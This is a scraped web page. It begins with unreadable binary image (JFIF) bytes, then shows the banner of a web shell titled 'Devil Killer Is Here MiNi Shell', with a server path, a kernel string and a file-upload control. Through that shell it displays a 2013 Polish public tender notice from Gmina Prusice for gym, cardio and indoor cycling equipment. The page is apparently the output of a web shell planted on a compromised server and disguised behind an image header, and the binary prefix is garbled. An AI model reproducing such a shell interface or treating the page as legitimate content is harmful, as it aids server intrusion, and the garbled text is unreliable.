JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131028/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131028/438514-N-2013.html

<p class="kh_header"><b>Prusice: Dostawa sprzętu sportowego do siłowni oraz sali fitness znajdującej się na działce ewidencyjnej nr 225 AM-1, obręb Prusice</b><br>
<b>Numer ogłoszenia: 438514 - 2013; data zamieszczenia: 28.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Prusice , Rynek 1, 55-110 Prusice, woj. dolnośląskie, tel. 071 3126224, faks 071 3126229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.prusice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu sportowego do siłowni oraz sali fitness znajdującej się na działce ewidencyjnej nr 225 AM-1, obręb Prusice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa sprzętu sportowego do siłowni oraz sali fitness znajdującej się na działce ewidencyjnej nr 225 AM-1, obręb Prusice.
2.	Zamówienie zostało podzielone na trzy części:
1)	Część I Maszyny siłowe, według poniższego opisu:
a) Urządzenia muszą stanowić jednolity zestaw maszyn profesjonalnych urządzeń przeznaczonych do pracy w klubach fitness - nielimitowana ilość godzin i intensywności pracy,
b) Celem zachowania jednolitej obsługi serwisowej oraz obsługi samych urządzeń przez użytkowników Zamawiający wymaga, aby urządzenia wchodzące w skład zestawu były wykonane w jednej linii kolorystycznej oraz stylistycznej na przykład pochodziły od jednego producenta,
c) Wszystkie oferowane urządzenia muszą posiadać deklarację zgodności i/lub certyfikat zgodności. Do dostawy należy dołączyć dokumenty potwierdzające spełnianie wymagań Zamawiającego w tym zakresie,
d)Każda z maszyn z tapicerką musi posiadać haftowane logo Prusickiego Centrum Fitness na tapicerce w wielkości minimum szer. 20 cm x wys. 10 cm w pełnej kolorystyce według wzoru stanowiącego załącznik nr 7 do SIWZ, 
e) Kolor tapicerki czarny z czarnymi obszyciami, 
f) Konstrukcja malowana na kolor srebrny,
g) Spis maszyn siłowych:
-przyrząd do ćw. m. przywodzicieli
-przyrząd do ćw. m. odwodzicieli
-przyrząd do ćwiczenia łydek
-wieża pięciostacyjna
-przyrząd do ćwiczenia bicepsów
-przyrząd do ćwiczeń mięśni brzucha- combi
-przyrząd do ćwiczeń mięśni prostych brzucha
-poręcz i drążek ze wspomaganiem
-suwnica na stos- ćwiczeń mięśni nóg
-prowadnica z odciążonym gryfem
-wypychanie ciężaru siedząc
-wyciskanie ciężaru siedząc
-przyrząd do ćwiczeń mięśni najszerszych grzbietu siedząc
-przyrząd do ćwiczeń mięśni grzbietu
-przyrząd do ćwiczeń mięśni dwugłowych i czworogłowych
-przyrząd do ćwiczeń mięśni łopatkowych i piersiowych
-ławka regulowana x 3 sztuki
-ławka regulowane ze stojakami
-ławka odwrotnie skośna regulowana
-stojak na gryfy i krążki
-stojak do przysiadów z zabezpieczeniem
-sztangielki chromowane 1-10 kg ze stojakiem
-ławka ze stojakami do trójboju
-gryf łamany l-1220 mm
-gryf olimpijski l-2200 mm
-gryf prosty l-1500 mm
-gryf sztangielki z tulejami o 50,l- 540
-gryf z obłym wygięciem
-obciążniki talerzowe
-zaciski
-Zestaw sztangielek 2-36kg ze stojakami

2)	Część II Maszyny cardio, według poniższego opisu: 
a) Urządzenia muszą stanowić jednolity zestaw maszyn profesjonalnych urządzeń przeznaczonych do pracy w klubach fitness - nielimitowana ilość godzin i intensywności pracy,
b) Celem zachowania jednolitej obsługi serwisowej oraz obsługi samych urządzeń przez użytkowników Zamawiający wymaga, aby urządzenia wchodzące w skład zestawu były wykonane w jednej linii kolorystycznej oraz stylistycznej na przykład pochodziły od jednego producenta.
c) Wszystkie oferowane urządzenia muszą posiadać deklarację zgodności i/lub certyfikat zgodności znak CE. Do dostawy należy dołączyć dokumenty potwierdzające spełnianie wymagań Zamawiającego w tym zakresie.
d)Na maszynach regenerowanych nie może być widoczny jakikolwiek ślad wcześniejszego użytkowania.
e)Wykonawca jest zobowiązany do przeprowadzenia szkolenia z obsługi klienta oraz przeszkolenia pracowników (3 os.) z użytkowania sprzętu cardio. Szkolenie zostanie przeprowadzone pod kątem zakupionego przez Zamawiającego  przedmiotu zamówienia oraz ma obejmować przeszkolenie pracowników w zakresie wykorzystania wszelkich funkcjonalności dostarczonego sprzętu. Dla potrzeb postępowania Zamawiający zakłada, że szkolenie obejmie grupę, co najmniej 3 osób. 

f) Spis maszyn siłowych:
-2 bieżnie nowe z ekranem dotykowym 19
-2 bieżnie regenerowane z wizualizacją biegu 2d
-2 rowery pionowe regenerowane
-2 rowery poziome regenerowane
-2 maszyny eliptyczne regenerowane
-2 ergometry nowe
3)	Część III Maszyny Indoor Cycling, według poniższego opisu: 
a)Urządzenia muszą stanowić jednolity zestaw maszyn profesjonalnych urządzeń przeznaczonych do pracy w klubach fitness - nielimitowana ilość godzin i intensywności pracy.
b)Celem zachowania jednolitej obsługi serwisowej oraz obsługi samych urządzeń przez użytkowników Zamawiający wymaga, aby urządzenia wchodzące w skład zestawu były wykonane w jednej linii kolorystycznej oraz stylistycznej na przykład pochodziły od jednego producenta.
c)Wszystkie oferowane urządzenia muszą posiadać deklarację zgodności i/lub certyfikat zgodności znak CE. Do dostawy należy dołączyć dokumenty potwierdzające spełnianie wymagań Zamawiającego w tym zakresie.
d)Wykonawca jest zobowiązany do przeprowadzenia szkolenia bassic dla osoby wskazanej przez Zmawiającego. Szkolenie zostanie przeprowadzone pod kątem zakupionego przez Zamawiającego  przedmiotu zamówienia oraz ma obejmować przeszkolenie pracownika w zakresie wykorzystania wszelkich funkcjonalności dostarczonego sprzętu. 

e)Spis maszyn Indoor Cycling:
-15 rowerów dla uczestników
-2 rowery dla instruktorów
-2 Krankcycle
-1 konsola z oprogramowaniem umożliwiająca wyświetlanie wizualizacji trasy oraz prowadzenia zajęć za pomocą wirtualnego trenera 
3.	Szczegółowy zakres i wymagania asortymentu zawarte są w wykazie sprzętu stanowiący załącznik nr 1a, 1b oraz 1c do niniejszej SIWZ, które wypełnione w zależności od części, na którą Wykonawca składa ofertę należy dołączyć do formularza ofertowego.
4.	Wykonawca w zakresie przedmiotu zamówienia zapewnia transport oraz montaż sprzętu do Sali fitness w budynku na działce ewidencyjnej nr 225 AM-1, obręb Prusice.
5.	Dostarczony sprzęt musi spełniać określone w wykazie normy bezpieczeństwa zgodnie z obowiązującymi przepisami prawa, w szczególności PN-EN 957-1:2006, PN-EN 957-2:2005, PN-EN 957-4:2007, PN-EN 957-8:2007, PN-EN 913:199.
6.	Zamawiający zastrzega sobie prawo odmowy odbioru przedmiotu zamówienia, jeżeli wśród urządzeń wchodzących w skład zestawu danej części znajdowały się będą urządzenia w innej linii kolorystycznej lub stylistycznej oraz stwierdzenia nienależytego wykonania umowy z konsekwencjami będącymi następstwem nienależytego wykonania.
7.	Wykonawca zobowiązany jest do zapewnienia bezpłatnego w ramach wyceny serwisu gwarancyjnego w poniższym zakresie:
1)	pierwszy w 30 dniu od daty odbioru całości sprzętu
2)	drugi w 90 dniu od daty odbioru całości sprzętu,
3)	przez okres trwania gwarancji w zależności od danego sprzętu, co najmniej 2 razy w roku na zgłoszenie zapotrzebowania przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.44.11.00-2, 37.44.13.00-4, 37.44.14.00-5, 37.44.19.00-0, 37.44.20.00-8, 37.44.23.00-8, 37.44.24.00-8, 37.44.29.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:
a)	pieniądzu; 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; 
c)	gwarancjach bankowych; 
d)	gwarancjach ubezpieczeniowych; 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2. ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

2)	Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.
3)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu Miasta i Gminy Prusice nr 27 9583 1019 0200 1300 2002 0005 Bank Spółdzielczy w Obornikach Śląskich O/ Prusice, przed upływem terminu składania ofert. Za termin wniesienia wadium w przypadku przelewu bankowego uważa się datę i godzinę wpływu środków na konto Zamawiającego. Niewniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie Wykonawcy z postępowania.
4)	Wymaga się, aby w gwarancji wadialnej zawarte były informacje, na podstawie, których możliwe byłoby zidentyfikowanie postępowania o udzielenie zamówienia publicznego.
5)	Określa się wysokość wadium na równowartość kwoty 
Część I Maszyny siłowe -1 000,00 PLN
Część II Maszyny cardio- 1 000,00 PLN
Część III Maszyny Indoor Cycling- 1 000,00 PLN

W przypadku złożenia oferty częściowej Wykonawca jest obowiązany wnieść wadium w kwocie określonej dla danej części, a w przypadku złożenia ofert na kilka części kwota wadium stanowi sumę wadiów ustalonych dla poszczególnych części zamówienia.
6)	Okoliczność wniesienia wadium powinna być weryfikowalna dla Zamawiającego, tj. wgląd w/w rachunek bankowy bądź zapoznanie się z właściwym dokumentem w ofercie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych standardów.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Fotografii bądź wizualizacji przedstawiających oferowane maszyny</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje możliwość dokonania istotnej zmiany postanowień umowy zawartej na skutek przeprowadzenia niniejszego postępowania w stosunku do treści oferty złożonej przez Wykonawcę, na podstawie, której dokonano wyboru Wykonawcy, w przypadku: 
1)	zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć w dacie dokonywania wyboru najkorzystniejszej oferty, w szczególności w przypadku zmian na rynku usług objętych niniejszym postępowaniem, wystąpienia istotnych trudności w pozyskaniu przez Wykonawcę lub Zamawiającego materiałów niezbędnych do wykonania zamówienia gdy zmiany są korzystne dla Zamawiającego, 
2)	zmiany wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki podatku VAT, 
3)	w sytuacjach, których, nie można było przewidzieć w chwili zawarcia umowy, a nie powstałych z winy Zamawiającego lub Wykonawcy, Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu zamówienia wraz z odpowiednim zmniejszeniem wynagrodzenia umownego;
4)	gdy zmiany będą korzystne dla Zamawiającego i nie będą:
a)	wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona;
b)	modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia.
lub będą polegały w szczególności na:
a)	skróceniu terminu wykonania umowy, przyśpieszenie ukończenia robót, dostaw lub usług,
b)	obniżeniu kosztu ponoszonego przez zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu zamówienia,
c)	obniżeniu kosztu wykonania przedmiotu zamówienia i tym samym wynagrodzenia wykonawcy,
d)	wydłużeniu termin gwarancji,
e)	podniesieniu bezpieczeństwa, wydajności lub parametrów technicznych urządzeń,
f)	zmianie ilości robót, usług lub dostaw, ale tylko mieszczących się w opisie przedmiotu zamówienia,
g)	zmianie w kolejności i terminach wykonywania robót budowlanych.
5)	Zmiana terminu realizacji z powodu okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymania realizacji przedmiotu zamówienia przez Zamawiającego,. 
6)	zmiana terminu realizacji umowy lub harmonogramu prac w związku z wystąpieniem potrzeby udzielenia zamówienia dodatkowego lub uzupełniającego, 
7)	zmiana terminu realizacji umowy na skutek opóźnienia wydania decyzji zezwolenia, uzgodnienia itp., lub konieczność uzyskania dodatkowych uzgodnień przez Wykonawcę do wydania, których, instytucje są zobowiązane na mocy przepisów prawa lub regulaminów, 
8)	gdy niedotrzymanie pierwotnego terminu realizacji umowy, stanowi konsekwencję zdarzeń niezależnych od Wykonawcy, nie stanowiących jego i podwykonawców problemów organizacyjnych - Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy o czas niezbędny do usunięcia konsekwencji zdarzeń;
9)	zmiana korzystna dla Zamawiającego naruszająca równowagę ekonomiczną umowy oraz wpływające na zmianę przedmiotu zamówienia, w przypadku zmiany okoliczności faktycznych sprawiających, że dalsza realizacja zamówienia publicznego w obecnym kształcie nie leżałaby w interesie publicznym,
10)	zmiany sposobu spełnienia świadczenia z powodu nadzwyczajnej zmiany stosunków w wyniku, których spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, czego strony nie przewidywały przy zawarciu umowy o zamówienie, 
11)	zmiany sposobu spełnienia świadczenia w sytuacji, gdy już po wyborze oferty zmieniły się okoliczności w sposób uniemożliwiający zawarcie umowy na warunkach wynikających z oferty,
12)	zmiana danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby biura Wykonawcy,
13)	zmiany danych osobowych - zmiany osób (personelu).

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.prusice.pl zakładka zamówienia publiczne /rok 2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Prusicach
ul. Rynek 1
55-110 Prusice
pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2013 godzina 11:00, miejsce: Urząd Miasta i Gminy w Prusicach
ul. Rynek 1
55-110 Prusice
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I Maszyny siłowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Część I Maszyny siłowe, według poniższego opisu:
a) Urządzenia muszą stanowić jednolity zestaw maszyn profesjonalnych urządzeń przeznaczonych do pracy w klubach fitness - nielimitowana ilość godzin i intensywności pracy,
b) Celem zachowania jednolitej obsługi serwisowej oraz obsługi samych urządzeń przez użytkowników Zamawiający wymaga, aby urządzenia wchodzące w skład zestawu były wykonane w jednej linii kolorystycznej oraz stylistycznej na przykład pochodziły od jednego producenta,
c) Wszystkie oferowane urządzenia muszą posiadać deklarację zgodności i/lub certyfikat zgodności. Do dostawy należy dołączyć dokumenty potwierdzające spełnianie wymagań Zamawiającego w tym zakresie,
d)Każda z maszyn z tapicerką musi posiadać haftowane logo Prusickiego Centrum Fitness na tapicerce w wielkości minimum szer. 20 cm x wys. 10 cm w pełnej kolorystyce według wzoru stanowiącego załącznik nr 7 do SIWZ, 
e) Kolor tapicerki czarny z czarnymi obszyciami, 
f) Konstrukcja malowana na kolor srebrny,
g) Spis maszyn siłowych:
-przyrząd do ćw. m. przywodzicieli
-przyrząd do ćw. m. odwodzicieli
-przyrząd do ćwiczenia łydek
-wieża pięciostacyjna
-przyrząd do ćwiczenia bicepsów
-przyrząd do ćwiczeń mięśni brzucha- combi
-przyrząd do ćwiczeń mięśni prostych brzucha
-poręcz i drążek ze wspomaganiem
-suwnica na stos- ćwiczeń mięśni nóg
-prowadnica z odciążonym gryfem
-wypychanie ciężaru siedząc
-wyciskanie ciężaru siedząc
-przyrząd do ćwiczeń mięśni najszerszych grzbietu siedząc
-przyrząd do ćwiczeń mięśni grzbietu
-przyrząd do ćwiczeń mięśni dwugłowych i czworogłowych
-przyrząd do ćwiczeń mięśni łopatkowych i piersiowych
-ławka regulowana x 3 sztuki
